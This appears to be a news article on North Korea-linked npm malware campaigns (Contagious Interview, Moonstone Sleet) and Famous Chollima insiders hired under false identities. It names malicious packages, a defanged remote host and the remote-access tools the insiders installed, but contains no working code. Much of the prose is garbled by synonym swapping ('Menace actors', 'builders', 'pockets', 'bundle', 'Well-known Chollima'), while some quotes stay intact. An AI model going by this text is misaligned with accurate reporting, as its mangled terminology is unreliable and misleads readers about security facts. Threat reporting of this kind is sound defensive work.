Menace actors with ties to North Korea have been noticed publishing a set of malicious packages to the npm registry, indicating “coordinated and relentless” efforts to focus on builders with malware and steal cryptocurrency property.
The newest wave, which was noticed between August 12 and 27, 2024, concerned packages named temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console.
“Behaviors in this campaign lead us to believe that qq-console is attributable to the North Korean campaign known as ‘Contagious Interview,'” software program provide chain safety agency Phylum stated.
Contagious Interview refers to an ongoing marketing campaign that seeks to compromise software program builders with data stealing malware as a part of a purported job interview course of that includes tricking them into downloading bogus npm packages or pretend installers for video conferencing software program resembling MiroTalk hosted on decoy web sites.
The top purpose of the assaults is to deploy a Python payload named InvisibleFerret that may exfiltrate delicate information from cryptocurrency pockets browser extensions and arrange persistence on the host utilizing professional distant desktop software program resembling AnyDesk. CrowdStrike is monitoring the exercise underneath the moniker Well-known Chollima.
The newly noticed helmet-validate bundle adopts a brand new method in that it embeds a bit of JavaScript code file referred to as config.js that straight executes JavaScript hosted on a distant area (“ipcheck[.]cloud”) utilizing the eval() operate.
“Our investigation revealed that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) that mirotalk[.]net resolved to when it was online,” Phylum stated, highlighting potential hyperlinks between the 2 units of assaults.
The corporate stated it additionally noticed one other bundle referred to as sass-notification that was uploaded on August 27, 2024, which shared similarities with beforehand uncovered npm libraries like call-blockflow. These packages have been attributed to a different North Korean risk group referred to as Moonstone Sleet.
“These attacks are characterized by using obfuscated JavaScript to write and execute batch and PowerShell scripts,” it stated. “The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim’s machine.”
Well-known Chollima Poses as IT Employees in U.S. Corporations
The disclosure comes as CrowdStrike linked Well-known Chollima (previously BadClone) to insider risk operations that entail infiltrating company environments underneath the pretext of professional employment.
“Famous Chollima carried out these operations by obtaining contract or full-time equivalent employment, using falsified or stolen identity documents to bypass background checks,” the corporate stated. “When applying for a job, these malicious insiders submitted a résumé typically listing previous employment with a prominent company as well as additional lesser-known companies and no employment gaps.”
Whereas these assaults are primarily financially motivated, a subset of the incidents are stated to have concerned the exfiltration of delicate data. CrowdStrike stated it has recognized the risk actors making use of to or actively working at greater than 100 distinctive firms over the previous 12 months, most of that are positioned within the U.S., Saudi Arabia, France, the Philippines, and Ukraine, amongst others.
Prominently focused sectors embody know-how, fintech, monetary providers, skilled providers, retail, transportation, manufacturing, insurance coverage, pharmaceutical, social media, and media firms.
“After obtaining employee-level access to victim networks, the insiders performed minimal tasks related to their job role,” the corporate additional stated. In some circumstances, the insiders additionally tried to exfiltrate information utilizing Git, SharePoint, and OneDrive.”
“Additionally, the insiders installed the following RMM tools: RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. The insiders then leveraged these RMM tools in tandem with company network credentials, which allowed numerous IP addresses to connect to the victim’s system.”
